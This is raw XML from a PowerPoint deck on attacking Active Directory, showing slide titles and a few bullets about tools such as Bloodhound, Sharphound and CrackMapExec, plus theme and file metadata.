            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94F83E11-AF64-46A8-8A79-5243C87C7991}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463826" y="1524000"/>
            <a:ext cx="11390244" cy="3679948"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>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a:lstStyle>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Fantastic tools for both Red and Blue teams!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quickly identify ‘control relations’ between objects in Active Directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Highly complex attack paths visualized in graphs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="131751712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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BD443DD-5887-45ED-B4A2-85592D950014}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1560910" y="1465765"/>
            <a:ext cx="9056784" cy="5099060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46F3AF80-E894-468F-B7BD-7D8ECB64549B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="164172"/>
            <a:ext cx="12192000" cy="783358"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bloodhound|Sharphound</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="205218293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0E5580"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="EBEBEB"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="ACD433"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="E6C133"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="EF7A24"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="5AA0F5"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="75CEEC"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="65D6A0"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="C4E46E"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="BDE0F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2000"/>
                <a:hueMod val="96000"/>
                <a:satMod val="128000"/>
                <a:lumMod val="114000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="phClr">
                <a:shade val="62000"/>
                <a:hueMod val="100000"/>
                <a:satMod val="134000"/>
                <a:lumMod val="56000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect l="45000" t="65000" r="125000" b="100000"/>
          </a:path>
        </a:gradFill>
        <a:blipFill rotWithShape="1">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1">
            <a:duotone>
              <a:schemeClr val="phClr">
                <a:shade val="62000"/>
                <a:hueMod val="108000"/>
                <a:satMod val="164000"/>
                <a:lumMod val="69000"/>
              </a:schemeClr>
              <a:schemeClr val="phClr">
                <a:tint val="96000"/>
                <a:hueMod val="90000"/>
                <a:satMod val="130000"/>
                <a:lumMod val="134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BACC050B-8757-4460-95D8-E37B46A6B42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Slice</Template>
  <TotalTime>24784</TotalTime>
  <Words>4442</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>1255</Paragraphs>
  <Slides>129</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129</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="136" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Titillium WebRegular</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Ion</vt:lpstr>
      <vt:lpstr>WARNING</vt:lpstr>
      <vt:lpstr>  Ryan Preston ~ Depth Security  Slides: https://github.com/h3xg4m3s</vt:lpstr>
      <vt:lpstr>Attacking Active Directory</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Attacking Active Directory</vt:lpstr>
      <vt:lpstr>Attacking Active Directory</vt:lpstr>
      <vt:lpstr>Attacking Active Directory</vt:lpstr>
      <vt:lpstr>Attacking Active Directory</vt:lpstr>
      <vt:lpstr>Command &amp; Control</vt:lpstr>
      <vt:lpstr>Command &amp; Control</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Attacking Active Directory</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Host Enumeration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ACL’s  DACL’s  SACL’s and  ACE’s</vt:lpstr>
      <vt:lpstr>CLUB AD</vt:lpstr>
      <vt:lpstr>CLUB AD</vt:lpstr>
      <vt:lpstr>CLUB AD</vt:lpstr>
      <vt:lpstr>CLUB AD</vt:lpstr>
      <vt:lpstr>CLUB AD</vt:lpstr>
      <vt:lpstr>CLUB AD</vt:lpstr>
      <vt:lpstr>CLUB AD</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Attacking Active Directory</vt:lpstr>
      <vt:lpstr>Attacking Active Directory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Network Enum</vt:lpstr>
      <vt:lpstr>Bloodhound / Sharphound</vt:lpstr>
      <vt:lpstr>Bloodhound|Sharphound</vt:lpstr>
      <vt:lpstr>Bloodhound|Sharphound</vt:lpstr>
      <vt:lpstr>Bloodhound|Sharphound</vt:lpstr>
      <vt:lpstr>Bloodhound|Sharphound</vt:lpstr>
      <vt:lpstr>Bloodhound|Sharphound</vt:lpstr>
      <vt:lpstr>Bloodhound|Sharphound</vt:lpstr>
      <vt:lpstr>Bloodhound|Sharphound Usage</vt:lpstr>
      <vt:lpstr>Bloodhound|Sharphound Usage</vt:lpstr>
      <vt:lpstr>Bloodhound|Sharphound</vt:lpstr>
      <vt:lpstr>Bloodhound|Sharphound</vt:lpstr>
      <vt:lpstr>Bloodhound|Sharphound</vt:lpstr>
      <vt:lpstr>Bloodhound|Sharphound</vt:lpstr>
      <vt:lpstr>Network Enumeration</vt:lpstr>
      <vt:lpstr>CrackMapExec</vt:lpstr>
      <vt:lpstr>CrackMapExec</vt:lpstr>
      <vt:lpstr>CrackMapExec</vt:lpstr>
      <vt:lpstr>CrackMapExec</vt:lpstr>
      <vt:lpstr>CrackMapExec</vt:lpstr>
      <vt:lpstr>Attacking Active Directory</vt:lpstr>
      <vt:lpstr>Attacking Active Directory</vt:lpstr>
      <vt:lpstr>Attacking Active Directory</vt:lpstr>
      <vt:lpstr>Attacking Active Directory</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Attacking Active Directory</vt:lpstr>
      <vt:lpstr>Attacking Active Directory</vt:lpstr>
      <vt:lpstr>Attacking Active Directory</vt:lpstr>
      <vt:lpstr>Attacking Active Directory</vt:lpstr>
      <vt:lpstr>Attacking Active Directory</vt:lpstr>
      <vt:lpstr>Attacking Active Directory</vt:lpstr>
      <vt:lpstr>Attacking Active Directory</vt:lpstr>
      <vt:lpstr>Ryan Preston ~ Depth Security   Teaching an XSS Workshop at Bsides KC on 4/20  https://bsideskc2018.busyconf.com/bookings/new</vt:lpstr>
      <vt:lpstr>  Ryan Preston ~ Depth Security  Send me feedback!  Slides: https://github.com/h3xg4m3s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Ryan Preston</dc:creator>
  <cp:lastModifiedBy>Ryan Preston</cp:lastModifiedBy>
  <cp:revision>208</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-11-07T16:34:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-02-14T00:59:54Z</dcterms:modified>
</cp:coreProperties>
</file>